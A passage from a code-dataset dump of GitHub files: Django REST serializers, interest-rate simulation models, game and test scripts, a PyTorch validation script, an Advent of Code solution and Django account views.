dest=\"collections\", nargs=\"+\", required=True, help=\"Name of the Firestore collections to retrieve\")\n parser.add_argument(\"--encrypted\", action=\"store_true\", help=\"Specify if the credentials file is stored in an encrypted sparseimage\")\n args = parser.parse_args()\n return vars(args)\n\n\ndef main(credpath: str, exportpath: str, collections: list[str], encrypted: bool = False):\n\n getdata(credpath=credpath, exportpath=exportpath, collections=collections, encrypted=encrypted)\n\n\nif __name__ == \"__main__\":\n main(**_cli())\n","repo_name":"daeh/jspsych-template","sub_path":"scripts/retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10564273796","text":"from rest_framework.serializers import ModelSerializer \nfrom rest_framework import serializers\nfrom post.models import Post, Comment, PostMedia, PostLike\n\nclass PostLikeSerializers(ModelSerializer):\n class Meta:\n model = PostLike\n fields = ['id', 'post', 'author']\n\nclass PostCommentsListSerializer(serializers.ListSerializer):\n\n def to_representation(self, data):\n user = self.context['request'].user\n new_data = data\n if hasattr(data, 'first') and data.first() is not None:\n print(data)\n post_author_id = data.first().reply_to.author.id\n # if not authenticated, show only approved comments\n # if owner of the post, show all comments including unapproved ones\n # if not the owner, show approved comments plus your own unapproved ones\n # if superuser, show all\n if not user.is_authenticated:\n print('not authenticated')\n new_data = data.filter(approved=True)\n else:\n if post_author_id == user.id:\n new_data=data\n else:\n print(\"looking for owned comments\")\n user_data = data.filter(author = user)\n new_data = user_data|data.filter(approved=True)\n new_data =new_data.order_by(\"-created_date\")\n return super(PostCommentsListSerializer, self).to_representation(new_data)\n \nclass PostMediaSerializers(ModelSerializer):\n class Meta:\n model = PostMedia\n fields = ['id', 'image']\n\nclass PostCommentSerializers(ModelSerializer):\n class Meta:\n model = Comment\n fields = ['id','text', 'author' , 'approved' , 'created_date']\n read_only_fields = ['author', 'approved' ,'created_date']\n list_serializer_class = PostCommentsListSerializer\n \nclass PostOwnerPostComentSerializers(ModelSerializer):\n class Meta:\n model = Comment\n fields = ['id','text', 'author', 
'approved','created_date']\n read_only_fields = ['author', 'created_date']\n list_serializer_class = PostCommentsListSerializer\n\nclass CommentSerializers(ModelSerializer):\n class Meta:\n model = Comment\n fields = ['id','text', 'author' , 'approved' , 'created_date']\n read_only_fields = ['author', 'approved' ,'created_date']\n\nclass PostOwnerComentSerializers(ModelSerializer):\n class Meta:\n model = Comment\n fields = ['id','text', 'author', 'approved','created_date']\n read_only_fields = ['author', 'created_date']\n\nclass PostSerializers(ModelSerializer):\n likes_count = serializers.SerializerMethodField(read_only=True)\n comments = PostCommentSerializers(source='comment_set', many=True, read_only=True)\n post_media = PostMediaSerializers(source='postmedia_set', many=True, required=False)\n\n class Meta:\n model = Post\n fields = [\n 'id', 'text', 'likes_count',\n 'post_media', 'author', 'approved', 'comments','created_date',\n ]\n read_only_fields = ['author', 'approved', 'comments','created_date',]\n \n def get_likes_count(self, obj):\n return obj.postlike_set.count()\n\n def create(self,validated_data):\n user = self.context['request'].user\n instance=Post.objects.create(author=user ,**validated_data)\n return instance\n\nclass PostOwnerPostSerializers(PostOwnerComentSerializers):\n likes_count = serializers.SerializerMethodField(read_only=True)\n post_media = PostMediaSerializers(source='postmedia_set', many=True, required=False)\n comments = PostOwnerPostComentSerializers(source='comment_set', many=True, read_only=True)\n class Meta:\n model = Post\n fields = [\n 'id', 'text', 'likes_count',\n 'post_media', 'author', 'approved', 'comments','created_date',\n ]\n read_only_fields = ['author', 'approved', 'comments','created_date',]\n def get_likes_count(self, obj):\n return obj.postlike_set.count()\n\nclass AdminPostSerializers(PostOwnerComentSerializers):\n likes_count = serializers.SerializerMethodField(read_only=True)\n post_media = PostMediaSerializers(source='postmedia_set', many=True, required=False)\n comments = PostOwnerPostComentSerializers(source='comment_set', many=True, read_only=True)\n class Meta:\n model = Post\n fields = [\n 'id', 'text', 'likes_count',\n 'post_media', 'author', 'approved', 'comments','created_date',\n ]\n read_only_fields = ['author', 'comments','created_date',]\n def get_likes_count(self, obj):\n return obj.postlike_set.count()\n","repo_name":"iamafasha/facebookpro","sub_path":"api/post_serializers.py","file_name":"post_serializers.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72434534827","text":"#!/usr/bin/env python\n\"\"\"\n    Stochastic models for interest rate term structures\n \tRun script to simulate. Option to replace input with own input. 
See bottom of file\n v0.1 - Mans Skytt (m@skytt.eu)\n\"\"\"\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom h5pyStorage import loadFromHDF5, storeToHDF5\nfrom forwardCurves import runSurfPlot\n\"\"\"\n#\tHelper function for checking timesteps\n\"\"\"\ndef checkTimesteps(timesteps):\n\tif timesteps % 1 != 0:\n\t\treturn int(round(timesteps))\n\telse:\n\t\ttimestepsInt = int(timesteps)\n\t\treturn timestepsInt\n\n\"\"\"\n#\tBrownian motion\n\"\"\"\ndef genBrownian(T, dt):\n\t\"\"\"\n\tT : Time until end, year base\n\treturns:\n\tdW : array with brownian motion from 0 to T with step size dt\n\t\"\"\"\n\ttimesteps = checkTimesteps(T/dt)\n\tif timesteps:\n\t\tdW = np.random.normal(0,np.sqrt(dt),timesteps)\n\t\treturn dW\n\treturn None\n\ndef genXBrownians(T, dt, X):\n\t\"\"\"\n\tT : Time until end, year base\n\tX : Number of brownian motions\n\treturns:\n\tdW : array with X brownian motions from 0 to T with step size dt\n\t\"\"\"\n\ttimesteps = checkTimesteps(T/dt)\n\tdW = genBrownian(T, dt)\n\ti = 1\n\twhile i < X:\n\t\tdWtemp = genBrownian(T, dt)\n\t\tdW = np.append(dW, dWtemp)\n\t\ti += 1\n\tdW = np.reshape(dW, (-1,X))\n\treturn dW\n\n\"\"\"\n#\tTwo-factor HJM\n\"\"\"\ndef twoFactorHJM(initVec, endTime):\n\t\"\"\"\n\tendTime : Time until stop of simulation, in years\n\tinitVec : Initial forward interest rate term structure\n\treturns: Time series of forecasted term structures\n\t\"\"\"\n\tsigma1 = 0.005 # volatility constants, replace with estimate made with a suitable approximation (ML or kalman)\n\tsigma2 = 0.01\n\tkappa = 0.1\n\tdt = 1/365 # time horizon time step \n\tsimdt = 7/365 # simulation timestep\n\tT = 10\n\thorizonTimesteps = initVec.shape[0] # Timesteps in horizon\n\tsimTimesteps = checkTimesteps(endTime/simdt) # Timesteps for simulation\n\t# Generate volatility and drift functions\n\tt = np.linspace(7/365, T, horizonTimesteps) # time horizon\n\tsigmaf1 = sigma1*np.ones(t.shape) # first volatility function, constant over entire horizon\n\tsigmaf2 = sigma2*np.exp(-kappa*t) # second volatility function, varying over horizon\n\tmu = sigma1**2*t + sigma2**2/kappa*np.exp(-kappa*t)*(1-np.exp(-kappa*t)) # drift function\n\t# Generate brownian motions until end of simulation\n\n\tdW1 = genBrownian(endTime, simdt) \n\tdW2 = genBrownian(endTime, simdt) \n\t# Simulate yield curve progression\n\tdphi = np.zeros((simTimesteps,initVec.shape[0]))# Pre allocate dphi array space\n\tdphi[0,:] = initVec # Add initial Vector as first\n\tfor i in range(1, simTimesteps):\n\t\tdphi[i,:] = mu*dt + sigmaf1*dW1[i] + sigmaf2*dW2[i]\n\treturn np.cumsum(dphi, axis=0) \n\n\"\"\"\n#\tPC-based HJM\n\"\"\"\ndef PCHJM(initVec, endTime, PCsMat):\n\t\"\"\"\n\tendTime : Time until stop of simulation, in years\n\tinitVec : Initial forward interest rate term structure\n\tPCsMat : Principal components equivalent of the volatility functions. 
Could also be volatility functions for every time horizon\n\treturns: Time series of forecasted term structures\n\t\"\"\"\n\tdt = 1/365 # time horizon time step \n\tsimdt = 7/365 # simulation timestep\n\tT = 10 # Time horizon max\n\tnumbFactors = PCsMat.shape[1]\n\thorizonTimesteps = initVec.shape[0] # Timesteps in horizon\n\tsimTimesteps = checkTimesteps(endTime/simdt) # Timesteps for simulation\n\n\tintegratedSigma = np.cumsum(PCsMat, axis=0) # row equal time horizon index, column equal different sigmas\n\tmu = np.sum(integratedSigma*PCsMat, axis=1) # \n\tdW = genXBrownians(endTime, simdt, numbFactors) \n\t# Simulate yield curve progression\n\tdphi = np.zeros((simTimesteps,initVec.shape[0]))# Pre allocate dphi array space\n\tdphi[0,:] = initVec # Add initial Vector as first\n\tfor i in range(1, simTimesteps):\n\t\tsigmaTemp = np.sum(np.multiply(PCsMat,dW[i,:]), axis = 1)*np.sqrt(252)\n\t\tdphi[i,:] = mu*dt + sigmaTemp\n\treturn np.cumsum(dphi, axis = 0)\n\ndef HoLee(initVec, endTime, vol):\n\t\"\"\"\n\tendTime : Time until stop of simulation, in years\n\tinitVec : Initial forward interest rate term structure\n\tvol : volatility, yearly basis\n\treturns: Time series of forecasted term structures\n\t\"\"\"\n\tdt = 1/365 # time horizon time step \n\tsimdt = 7/365 # simulation timestep\n\tT = 10\n\thorizonTimesteps = initVec.shape[0] # Timesteps in horizon\n\tsimTimesteps = checkTimesteps(endTime/simdt) # Timesteps for simulation\n\t# Generate volatility and drift functions\n\tt = np.linspace(7/365, T, horizonTimesteps) # time horizon\n\tvolf = vol*np.ones(t.shape) # volatility, constant over entire horizon\n\tmu = vol**2*t # drift function\n\t# Generate brownian motions until end of simulation\n\tdW = genBrownian(endTime, simdt) \n\t\n\t# Simulate yield curve progression\n\tdphi = np.zeros((simTimesteps,initVec.shape[0]))# Pre allocate dphi array space\n\tdphi[0,:] = initVec # Add initial Vector as first\n\tfor i in range(1, simTimesteps):\n\t\tdphi[i,:] = mu*dt + volf*dW[i]\n\treturn np.cumsum(dphi, axis=0) \n\n\n\n# Load from storage file\nstorageFile = 'EONIAmid.hdf5' # Name of file where data is currently stored\nMATLABForwardMat = loadFromHDF5(storageFile,'MATLABForwardMat')\nMATLABForwardVec = MATLABForwardMat[0,:]\ntimes = loadFromHDF5(storageFile,'times')\nMATLABForPCs = loadFromHDF5(storageFile, 'MATLABForPCs')\n\n# Run simulations, comment out the ones not used\nphi = PCHJM(MATLABForwardVec, 5, MATLABForPCs)\n# phi = twoFactorHJM(MATLABForwardVec, 8)\n#phi = HoLee(MATLABForwardVec, 5, 0.1)\n\nrunSurfPlot(phi[:,:times.shape[0]], times)\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mskytt/AoMMaster","sub_path":"HJMmodels.py","file_name":"HJMmodels.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20243800260","text":"import unittest\nfrom src.pet import Pet\nfrom src.ability.ability_generator import AbilityGenerator\nfrom src.ability.ability import Ability\nfrom src.ability.modify_stats import ModifyStatsAbilityRandomFriend\nfrom src.pet_data_utils.enums.trigger_event import TriggerEvent\nfrom src.pet_data_utils.enums.effect_kind import EffectKind\nfrom src.pet_data_utils.enums.effect_target_kind import EffectTargetKind\nfrom src.team.team import Team\n\n\nclass TestAbility(unittest.TestCase):\n\n def setUp(self):\n self.test_pet = Pet(name=\"Test Pet\", attack=1, health=1, tier=1, level=1,\n ability1=None, ability2=None, ability3=None, 
ability_generator=AbilityGenerator)\n self.friend_pet1 = Pet(name=\"Test Friend Pet 1\", attack=1, health=1, tier=1, level=1,\n ability1=None, ability2=None, ability3=None, ability_generator=AbilityGenerator)\n self.friend_pet2 = Pet(name=\"Test Friend Pet 2\", attack=1, health=1, tier=1, level=1,\n ability1=None, ability2=None, ability3=None, ability_generator=AbilityGenerator)\n self.test_team = Team()\n self.test_team.add_pet(self.test_pet)\n self.test_team.add_pet(self.friend_pet1)\n self.test_team.add_pet(self.friend_pet2)\n\n def test_modify_stats_ability_random_friend_attributes(self):\n ability = ModifyStatsAbilityRandomFriend(owner=self.test_pet, attack_mod=1, health_mod=1,\n target_type=EffectTargetKind.RandomFriend, target_n=2,\n trigger_event=TriggerEvent.StartOfBattle, until_end_of_battle=True)\n\n self.assertIsInstance(ability, Ability)\n self.assertIn(ability.target_type, EffectTargetKind)\n self.assertIn(ability.trigger_event, TriggerEvent)\n\n def test_modify_stats_ability_random_friend_apply(self):\n ability = ModifyStatsAbilityRandomFriend(owner=self.test_pet, attack_mod=1, health_mod=1,\n target_type=EffectTargetKind.RandomFriend, target_n=2,\n trigger_event=TriggerEvent.StartOfBattle, until_end_of_battle=True)\n\n ability.trigger(event=TriggerEvent.StartOfBattle, pet=self.test_pet, team=self.test_team)\n\n self.assertEqual(self.friend_pet1.attack, 2)\n self.assertEqual(self.friend_pet1.health, 2)\n self.assertEqual(self.friend_pet1.attack, self.friend_pet2.attack)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MrKnowles55/super-auto-pets-simulator","sub_path":"tests/ability/test_modify_stats.py","file_name":"test_modify_stats.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25583087108","text":"import time\nimport logging\n\nfrom RuckusAutoTest.models import Test\n\nfrom RuckusAutoTest.components.lib.zd import scaling_zd_lib as lib\nfrom RuckusAutoTest.components.lib.simap import image_installer as installer\n\nclass CB_Scaling_Upgrade_SIMAP(Test):\n \n required_components = [\"ZoneDirector\"]\n parameter_description = {}\n\n def config(self, conf):\n self.conf = dict(simap_cfg = dict(tftpserver = '192.168.0.20',\n version = '9.0.0.0.21',\n model = 'ss2942'))\n \n self.conf.update(conf)\n self.simap_models = self.carrierbag['existed_simap_models']\n self.package_simap_cfg = self.conf['simap_cfg']\n self.package_simap_cfg['simap_models'] = self._retrieve_models(self.simap_models)\n \n self.agent = self.carrierbag['existed_sim_agent']\n self.zd = self.testbed.components['ZoneDirector']\n self.zdcli = self.testbed.components['ZoneDirectorCLI']\n \n def test(self): \n logging.info('package_sim-cfg [%s]' % self.package_simap_cfg)\n installer.install(self.zdcli, **self.package_simap_cfg)\n logging.info('SIMAP firmware configure successfully') \n self._bootup_simaps(self.agent, self.simap_models)\n if not self._verify_simaps_from_vm(self.agent, len(self.simap_models)):\n raise Exception('Some of SIMAPs haven\\'t boot up correctly, please check.')\n \n logging.info('[Initial]begin verify RuckusAPs and SimAPs, make sure all of them are connected.') \n try: \n self.zd.do_login()\n except:\n pass\n \n lib.verify_aps_by_models(self.zd, self.simap_models)\n logging.info('All of RuckusAPs and SimAPs are connected.')\n return self.returnResult(\"PASS\", \"All of RuckusAPs and SimAPs[%s] are connected.\" % self.simap_models) \n\n \n def cleanup(self):\n 
pass\n\n\n def _bootup_simaps(self, agent, models):\n simcfg = { \n 'ap_start_mac' : '00:13:92:03:02:00',\n 'ap_cnt' : 1,\n 'ap_mode':'zf9999',\n } \n for index in range(len(models)):\n simcfg['ap_mode'] = models[index]\n macID = '00'\n macID = self._convert_hex(index + 1)\n simcfg['ap_start_mac'] = '00:13:92:03:02:%s' % macID\n simcfg['ap_cnt'] = 1\n simcfg['rogue'] = 0\n simcfg['tap_id'] = index + 1\n agent.touch_tcfg(simcfg)\n agent.startup_single_simap()\n \n \n def _verify_simaps_from_vm(self, agent, expect_cnt, timeout=90):\n startT = time.time()\n # loop until timeout; previously the timeout check was nested inside 'while True', which made the final 'return False' unreachable\n while time.time() - startT < timeout:\n cnt = agent.get_sim_ap_nums()\n if cnt != expect_cnt:\n logging.info('[%d] SimAPs have started, waiting for another[%d]' % (cnt, expect_cnt - cnt))\n time.sleep(5)\n \n else: \n return True\n \n return False ","repo_name":"jichunwei/MyGitHub-1","sub_path":"saigon/rat/RuckusAutoTest/tests/zd/CB_Scaling_Upgrade_SIMAP.py","file_name":"CB_Scaling_Upgrade_SIMAP.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8711907609","text":"import pygame\nimport importlib.util\nimport sys\n\nfrom pygame import color\n\nclass Board:\n\n def __init__(self, rows: int, cols: int, width: int, height: int, win) -> None:\n self.rows = rows\n self.cols = cols\n self.width = width\n self.height = height\n self.win = win\n \n def draw(self):\n gap = self.width // 9\n for i in range(self.rows+1):\n if i % 3 == 0:\n thickness = 4\n else: \n thickness = 1\n pygame.draw.line(self.win, (0, 0, 0), (0, i*gap), (self.width, i*gap), thickness)\n pygame.draw.line(self.win, (0, 0, 0), (i*gap, 0), (i*gap, self.height), thickness)\n\nclass Tile:\n rows = 9\n cols = 9\n\n def __init__(self, val: int, row: int, col: int, width: int, height: int) -> None:\n self.val = val\n self.temp = 0\n self.row = row\n self.col = col\n self.width = width\n self.height = height\n\n def draw(self, win):\n fnt = pygame.font.SysFont(\"comicsans\", 40)\n\n gap = self.width // 9\n x = self.col * gap\n y = self.row * gap\n\ndef redraw_window(win, board):\n win.fill((255, 255, 255))\n board.draw()\n\ndef main():\n run = True\n win = pygame.display.set_mode((540, 600))\n pygame.display.set_caption(\"Sudoku\")\n\n board = [[9, 0, 0, 0, 0, 0, 0, 3, 8],\n [0, 5, 0, 2, 4, 6, 7, 9, 1],\n [0, 0, 0, 3, 0, 0, 4, 0, 0],\n [7, 0, 3, 0, 5, 8, 1, 0, 2],\n [0, 0, 0, 0, 0, 0, 0, 6, 7],\n [0, 0, 0, 0, 9, 0, 3, 8, 0],\n [0, 3, 0, 0, 0, 5, 8, 2, 4],\n [5, 8, 2, 4, 0, 3, 6, 1, 9],\n [0, 6, 9, 0, 2, 1, 5, 0, 0]]\n \n board = Board(9, 9, 540, 540, win)\n\n\n while run:\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n \n # redraw_window(win, board)\n\n\n\nmain()\npygame.quit()\n\n\n","repo_name":"nbermingham/backtracking","sub_path":"sudoku_gui.py","file_name":"sudoku_gui.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2313629630","text":"# 임규연 (lky473736)\n# Controlling movement with the keyboard\n\n# Represents a turtle moving on a Cartesian coordinate plane\n# Left key : turn 30 degrees to the left\n# Right key : turn 30 degrees to the right\n# The turtle is always moving forward\n\nimport turtle\n\nt = turtle.Turtle()\nt.shapesize(3, 1) # shapesize : the arguments scale the shape n times in width, then height order\nt.speed (3)\n\ns = turtle.getscreen()\n\ndef left() :\n t.lt(30)\n t.fd(30)\n \ndef right() :\n t.rt(30)\n t.fd(30)\n\ns.onkeypress(left, \"Left\")\ns.onkeypress(right, \"Right\")\n 
\ns.listen() # the screen must listen for key events before onkeypress handlers fire\nturtle.mainloop()","repo_name":"lky473736/practice-learningpython","sub_path":"t3-2.py","file_name":"t3-2.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74178861866","text":"import os\nimport json\nimport torch\nimport torch.nn as nn\nfrom torchvision import transforms, datasets\nimport time\nfrom tqdm import tqdm\n#from model import resnet34\ndef main(args):\n    device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n    data_transform = {\n        \"val\": transforms.Compose([transforms.Resize(256),\n                                   transforms.CenterCrop(224),\n                                   transforms.ToTensor(),\n                                   transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])}\n\n    image_path = args.scence_data_path\n    image_path = '/home/data/gzb/Scence_datasets/images'\n    assert os.path.exists(image_path), \"{} path does not exist.\".format(image_path)\n\n\n\n    validate_dataset = datasets.ImageFolder(root=image_path,\n                                            transform=data_transform[\"val\"])\n    val_num = len(validate_dataset)\n\n    Scense_list = validate_dataset.class_to_idx\n    validate_loader = torch.utils.data.DataLoader(validate_dataset,\n                                                  batch_size=args.batch_size, shuffle=False,\n                                                  num_workers=4)\n    # net = resnet34()\n    #in_channel = net.fc.in_features\n    # net.fc = nn.Linear(in_channel, 51)\n    #net.to(device)\n    # load model weights\n    weights_path = \"/home/guozebin/Scence_project/model.pth\"\n    assert os.path.exists(weights_path), \"file: '{}' does not exist.\".format(weights_path)\n    net=torch.load(weights_path, map_location=device)\n    val_acc = 0\n    start_time=time.time()\n    with torch.no_grad():\n        val_bar=tqdm(validate_loader)\n        for val_data in val_bar:\n            val_images, val_labels = val_data\n            outputs1 = net(val_images.to(device))\n            predict_y = torch.max(outputs1, dim=1)[1]\n            val_acc += torch.eq(predict_y, val_labels.to(device)).sum().item()\n    val_accurate = (val_acc / val_num)*100\n    print(\"#Total Images {}\".format(val_num))\n    with open('val_result.txt','a') as f:\n        f.write(\"#Total Images {}\".format(val_num))\n        f.write('\\n')\n    print('#Class {}'.format(len(Scense_list)))\n    with open('val_result.txt','a') as f:\n        f.write('#Class {}'.format(len(Scense_list)))\n        f.write('\\n')\n    print('Recognition accuracy ={:.1f}%({}/{}) run_time {:.2f}s'.format(val_accurate,val_acc,val_num,(time.time()-start_time)))\n    with open('val_result.txt','a') as f:\n        f.write('Recognition accuracy ={:.1f}%({}/{}) run_time {:.2f}s'.format(val_accurate,val_acc,val_num,(time.time()-start_time)))\n        f.write('\\n')\n        f.write('Finished validation')\n    print('Finished validation')\n\n\n\n\n\n\nif __name__ == '__main__':\n    import argparse\n    parser = argparse.ArgumentParser(\n        description=__doc__)\n    parser.add_argument('--scence_data_path', default='/home/data/gzb/Scence_train_val_data', help='val path')\n    parser.add_argument('--batch_size', default=64, help='val batch size')\n    args = parser.parse_args()\n    main(args)\n","repo_name":"Bin-ze/Scence_classify","sub_path":"val.py","file_name":"val.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72524891947","text":"import re\nfrom datetime import datetime, date, time, timedelta\t#import some datetime modules so we can deal with the dates and times in the records.\nfrom copy import copy\t\t\t\t\t#I can't honestly remember what we need 'copy' for, maybe nothing.\n\n#Example data (three variants):\n# [1518-11-01 00:00] Guard #10 begins shift\n# [1518-11-01 
00:05] falls asleep\n# [1518-11-01 00:25] wakes up\n\n\n#we need to load in all the records (which are all mixed up) and sort them into chronological order\n\nrecords = []\t#create a list called 'records'\n\nfile = open('4-1-input.txt', 'r')\t#open the file containing the inputs provided by AoC\n\n#--beginning of for loop--\n\nfor line in file.readlines():\t\t#read the file, one line at a time\n\n getRecord = re.match('\\[(\\d{4}-\\d{2}-\\d{2}\\s\\d{2}:\\d{2})\\]\\s(\\w)\\w+\\s#*(\\d*)' , line.rstrip())\t#regular expressions \\o/\n\n if getRecord is None:\t\t#if the regular expression does not find a match in the line we read in\n print(\"'\" + line.rstrip() + \"'\" + ' is not a valid record.')\n else:\n dt = datetime.strptime(getRecord[1],\"%Y-%m-%d %H:%M\")\t#if we do find a match for the regular expression, turn the date and time part into a 'datetime' object\n\n if getRecord[3] != '':\t\t#if the 3rd part of the regular expression (the guard ID number) exists\n state = 'g'\t\t\t#set the 'state' to 'g' (a guard begins a shift)\n guardID = getRecord[3]\t\t#grab the ID of the guard who began the shift\n else:\n state = getRecord[2]\t\t#if the guard ID did not exist on that line, set the 'state' to the 'f'(alls asleep) or 'w'(akes up) we picked up in the RE \n guardID = None\t\t\t#and set the guard ID to none (as there wasn't one in this line)\n \n record = [dt, state, guardID]\t#create a list (basically an array) containing the 'datetime' object, the state [g(uard #x begins shift), f(alls asleep), or w(akes up)]\n\t\t\t\t\t#and the guardID [which is either a number-as-string or 'None'].\n records.append(record)\t\t# and then append it to 'records', which is the list of records we created/initialised before we started the for loop\n\n#--end of loop--\n \t\t\t\t\t\n\nrecords.sort(key=lambda element:element[0])\t#sort the records list according to element 0, which is the datetime object\n\n\n\nguardSleeps = {}\t\t\t#create a dictionary called 'guardSleeps'; this will contain 'keys'(the guard IDs) and 'values'(the number of minutes\n\t\t\t\t\t#they slept for: we will increment this as we search the list of records.\n\nguardRecords = []\t\t\t#create a list(array) called 'guardRecords'\n\n\n#--beginning of for loop\n\nfor record in records:\t\t\t#for each record in our sorted-by-date-and-time 'records' list, look through them one-by-one;\n if record[1] == 'g': \t\t\t#if the second item in our record is a 'g' (denoting a guard coming on shift),\n g = record[2] \t\t\t#then get the guard ID from the record, and store it in a new variable g.\n continue\t\t\t\t#Next we need to look at the records following this one, so stop this iteration of the loop and move to the next record.\n\n elif record[1] == 'f':\t\t#if the letter is an 'f' instead, then this is denoting when the aforementioned guard fell asleep;\n f = record[0]\t\t\t#So store the time from this record (the time the guard fell asleep) in the new variable f.\n continue\t\t\t\t#Then jump out of the loop and go back to the top of it, looking at the next record. 
\n\n elif record[1] == 'w':\t\t#if the letter is a 'w', this denotes when the guard woke up;\n w = record[0]\t\t\t#So take the time from the beginning of this record and store it in a new variable w.\n\n sleepAmount = w - f\t\t\t#we can perform arithmetic on datetime objects, so get the length of the guard's sleep,\n\t\t\t\t\t#by subtracting the fellAsleep time from the wake time.\n\n if g not in guardSleeps:\t\t#if the guardID is not already in our dictionary of guard sleep amounts,\n guardSleeps[g] = sleepAmount\t#then create a new key&value pair, like: guardID (as key): sleepAmount (as value)\n else:\n guardSleeps[g] += sleepAmount\t#Otherwise (if we have already stored this guardID in our dictionary) add the sleepAmount to whatever value is already\n\t\t\t\t\t#stored against that guardID.\n\n guardRecord = [g,f,w]\t\t\t#create a new record containing the guard ID [0], fall asleep time [1], woke up time [2] we have just found,\n guardRecords.append(guardRecord)\t#and add them as a line in our 'guardRecords' list.\n\n#--end of the for loop--\n\n \nsorted_guardSleeps = sorted(guardSleeps.items(), key=lambda element: element[1], reverse = True)\t#reverse-sort our dictionary of guardSleeps by element[1], \n\t\t\t\t\t\t\t\t\t\t\t\t\t#which is the value, so that the highest value is at the top.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\nsleepyGuard = sorted_guardSleeps[0][0]\t\t#create a variable 'sleepyGuard' and set it to the key(the guardID) at the top of our sorted dictionary.\nsG_sleepAmount = sorted_guardSleeps[0][1]\t#create a variable 'sG_sleepAmount' and set it to the value at the top of our sorted dictionary.\n\nprint('\\nThe guard who slept the most is guard ' + sleepyGuard + '.')\t#Tell everyone on the commandline who the sleepiest guard is,\nprint('They slept for ' + str(sG_sleepAmount) + ' hours:minutes.\\n')\t#and how long they slept for in total.\n\n\n#But we need to find out which minute this very sleepy guard is most often asleep in:\n\nsgRecords = []\t\t#make a new list called sgRecords (short for sleepguard Records)\n\n\nfor guardRecord in guardRecords:\t\t#Loop through all our guard records,\n if guardRecord[0] == sleepyGuard:\t\t#until we find one for our sleepy guard\n sgRecords.append(guardRecord) \t\t#Add any matching records that we find to the sgRecords list.\n\nminuteFrequency = {}\t\t#Create a new dictionary 'minuteFrequency'.\nfor i in range (0,60):\t\t#loop through the range 0 to 59: these numbers represent the minutes of an hour.\n minuteFrequency[i] = 0\t#for each of this range, create a key and value pair in the dictionary, as {minute number: 0}.\n\nfor sgRecord in sgRecords:\t\t\t\t\t#loop through the sleep records of our sleepy guard;\t\n for i in range (sgRecord[1].minute, sgRecord[2].minute):\t#in each of the records, loop through the range of minutes from the 'f' minute to the 'w' minute.\n minuteFrequency[i] +=1\t\t\t\t\t#for each minute in this range, increment the value of that 'minute' key in the dictionary by 1. 
\t\t\t\t\n\nsorted_minuteFreq = sorted(minuteFrequency.items(), key=lambda element: element[1], reverse = True)\t#reverse-sort the dictionary by the values (not the keys),\n\t\t\t\t\t\t\t\t\t\t\t\t\t#and store the resulting dictionary with a new name.\n\nmostFreqMin = sorted_minuteFreq[0][0]\t\t#Store the key that is at the top of our sorted dictionary as the variable 'mostFreqMin' (because it is).\npuzzleAns = mostFreqMin * int(sleepyGuard)\t#Make a new variable 'puzzleAns', and calculate the answer to Part 1 of the 'Day 4' puzzle.\n\nprint('\\nThe minute the guard was most often asleep in was: ' + str(mostFreqMin) + '.')\t\t#Print the minute our guard was most often asleep to the console.\nprint('The answer to the puzzle is: ' + str(puzzleAns) + '.\\n')\t\t\t\t\t#Print the puzzle answer to the console.\n\n#--END--\n\n\n\n\n\n\n","repo_name":"hazelsavage/AoC-2018","sub_path":"4-1-commented.py","file_name":"4-1-commented.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22550868158","text":"from django.shortcuts import render, redirect, get_object_or_404\n\nfrom .forms import UserCreateUpdateModelForm, ProfileUpdate\n\nfrom branches.models import Branch\nfrom django.forms import modelformset_factory\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import ListView\nfrom .filter import UserFilter\n\nUSER = get_user_model()\nfrom utils.decorators import ad_required_fbv, profile_owner_only\n\n\nclass UserListView(ListView):\n model = USER\n template_name = \"accounts/list.html\"\n paginate_by = 20\n\n def get_context_data(self, **kwargs):\n context = super(UserListView, self).get_context_data(**kwargs)\n context['filter'] = UserFilter(self.request.GET)\n branch_slug = self.kwargs.get('branch_slug')\n if branch_slug.lower() == 'all':\n context['branch_title'] = 'ทั้งหมด'\n context['branch_slug'] = 'all'\n else:\n context['branch_title'] = Branch.objects.get(slug=branch_slug).title\n context['branch_slug'] = Branch.objects.get(slug=branch_slug).slug\n\n return context\n\n def get_queryset(self):\n branch_slug = self.kwargs.get('branch_slug')\n if branch_slug.lower() == 'all':\n qs = self.model.objects.all()\n else:\n qs = self.model.objects.filter(branch__slug=branch_slug)\n filtered_list = UserFilter(self.request.GET, queryset=qs)\n return filtered_list.qs\n\n\ndef user_detail_view(request, branch_slug, username):\n if branch_slug == 'all':\n obj = get_object_or_404(USER, username=username)\n else:\n obj = get_object_or_404(USER, branch__slug=branch_slug, username=username)\n template_name = 'accounts/detail.html'\n context = {\n \"object\": obj,\n 'branch_slug': branch_slug,\n\n }\n\n if obj.branch:\n context['branch_title'] = obj.branch.title\n 